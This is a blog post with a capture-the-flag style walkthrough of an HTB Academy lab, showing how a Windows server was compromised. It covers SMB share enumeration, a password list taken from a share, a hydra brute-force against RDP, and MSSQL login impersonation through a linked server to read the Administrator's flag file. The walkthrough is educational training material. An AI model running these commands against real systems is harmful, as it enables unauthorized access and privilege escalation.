DEV Community

maz4l
maz4l

Posted on • Edited on

HTB Academy: Attacking Common Services - Hard Lab

Image description

In this lab, we are tasked with compromising a third internal server within the inlanefreight.htb domain. This server is used to manage files and working materials, such as forms, and it also hosts a database whose purpose is not immediately clear. Our objective is to gain administrative privileges by exploiting vulnerabilities in the server's configuration.

Questions:

  1. What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)
  2. Enumerate the target and find a password for the user Fiona. What is her password?
  3. Once logged in, what other user can we compromise to gain admin privileges?
  4. Submit the contents of the flag.txt file on the Administrator Desktop.

Steps to Solution

1. Network and Service Enumeration

First, we perform a comprehensive network scan using nmap to identify open ports and running services:

nmap -sV -sC -Pn $TARGET_IP
Enter fullscreen mode Exit fullscreen mode

Results:

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enter fullscreen mode Exit fullscreen mode

2. SMB Enumeration

To explore the SMB shares available on the target, we use smbclient:

smbclient -N -L //TARGET_IP/
Enter fullscreen mode Exit fullscreen mode

Results:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Home            Disk
IPC$            IPC       Remote IPC
Enter fullscreen mode Exit fullscreen mode

Next, we list the contents of the Home share:

smbclient //10.129.XXX.XX/Home
Password for [WORKGROUP\htb-ac-552074]:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> ls
  .                                   D        0  Thu Apr 21 16:18:21 2022
  ..                                  D        0  Thu Apr 21 16:18:21 2022
  HR                                  D        0  Thu Apr 21 15:04:39 2022
  IT                                  D        0  Thu Apr 21 15:11:44 2022
  OPS                                 D        0  Thu Apr 21 15:05:10 2022
  Projects                            D        0  Thu Apr 21 15:04:48 2022

\HR
  .                                   D        0  Thu Apr 21 15:04:39 2022
  ..                                  D        0  Thu Apr 21 15:04:39 2022

\IT
  .                                   D        0  Thu Apr 21 15:11:44 2022
  ..                                  D        0  Thu Apr 21 15:11:44 2022
  Fiona                               D        0  Thu Apr 21 15:11:53 2022
  John                                D        0  Thu Apr 21 16:15:09 2022
  Simon                               D        0  Thu Apr 21 16:16:07 2022

\OPS
  .                                   D        0  Thu Apr 21 15:05:10 2022
  ..                                  D        0  Thu Apr 21 15:05:10 2022

\Projects
  .                                   D        0  Thu Apr 21 15:04:48 2022
  ..                                  D        0  Thu Apr 21 15:04:48 2022

\IT\Fiona
  .                                   D        0  Thu Apr 21 15:11:53 2022
  ..                                  D        0  Thu Apr 21 15:11:53 2022
  creds.txt                           A      118  Thu Apr 21 15:13:11 2022

\IT\John
  .                                   D        0  Thu Apr 21 16:15:09 2022
  ..                                  D        0  Thu Apr 21 16:15:09 2022
  information.txt                     A      101  Thu Apr 21 16:14:58 2022
  notes.txt                           A      164  Thu Apr 21 16:13:40 2022
  secrets.txt                         A       99  Thu Apr 21 16:15:55 2022

\IT\Simon
  .                                   D        0  Thu Apr 21 16:16:07 2022
  ..                                  D        0  Thu Apr 21 16:16:07 2022
  random.txt                          A       94  Thu Apr 21 16:16:48 2022

        7706623 blocks of size 4096. 3165043 blocks available
smb: \> 

Enter fullscreen mode Exit fullscreen mode

For getting files, use command get or mget *. To read use: !cat . Information from these files can be very useful!

smb: \> cd IT/John
smb: \IT\John\> ls
  .                                   D        0  Thu Apr 21 16:15:09 2022
  ..                                  D        0  Thu Apr 21 16:15:09 2022
  information.txt                     A      101  Thu Apr 21 16:14:58 2022
  notes.txt                           A      164  Thu Apr 21 16:13:40 2022
  secrets.txt                         A       99  Thu Apr 21 16:15:55 2022

        7706623 blocks of size 4096. 3141055 blocks available
smb: \IT\John\> mget *
Get file information.txt? y
getting file \IT\John\information.txt of size 101 as information.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
Get file notes.txt? y
getting file \IT\John\notes.txt of size 164 as notes.txt (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file secrets.txt? y
getting file \IT\John\secrets.txt of size 99 as secrets.txt (2.8 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \IT\John\> !cat information.txt
To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.
smb: \IT\John\> !cat notes.txt
Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world ...
smb: \IT\John\> !cat secrets.txt
Password Lists:

1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123

smb: \IT\John\> 
Enter fullscreen mode Exit fullscreen mode

Try to use one of these for password attacks.

3. Password Discovery

Using the hydra tool, we brute-force the Remote Desktop Protocol (RDP) service to discover the password for the user Fiona:

hydra -l Fiona -P XXXXX.txt 10.129.xxx.xx rdp
Enter fullscreen mode Exit fullscreen mode

Result:

[3389][rdp] host: 10.129.xxx.xx   login: Fiona   password: $PASSWORD
Enter fullscreen mode Exit fullscreen mode

4. Remote Desktop Access

With the credentials obtained, we establish an RDP connection:

rdesktop -u Fiona -p '$PASSWORD' $TARGET_IP
Enter fullscreen mode Exit fullscreen mode

5. SQL Server Enumeration and Privilege Escalation

Once connected, we use sqlcmd to enumerate SQL Server tables and execute commands to escalate privileges:

PS C:\Users\Fiona> sqlcmd

1> SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES;
2> go
Enter fullscreen mode Exit fullscreen mode

To escalate privileges, we execute commands as another user and check server roles:

EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go
Enter fullscreen mode Exit fullscreen mode

Finally, to gather more information about the linked servers and their configuration:

SELECT srvname, isremote FROM sysservers;
go
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [local.test.linked.srv];
go
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
go

HTB{46u$**********_$3rv3r$}
Enter fullscreen mode Exit fullscreen mode

By systematically enumerating services, discovering valid credentials, and leveraging SQL Server commands, we were able to compromise multiple user accounts, ultimately gaining administrative access to the server. The contents of the flag.txt file were retrieved from the Administrator's desktop, completing the task.

HAPPY HACKING!

Subscribe! To Get More HTB Cubes ->
Image description

My HTB BADGE

Top comments (0)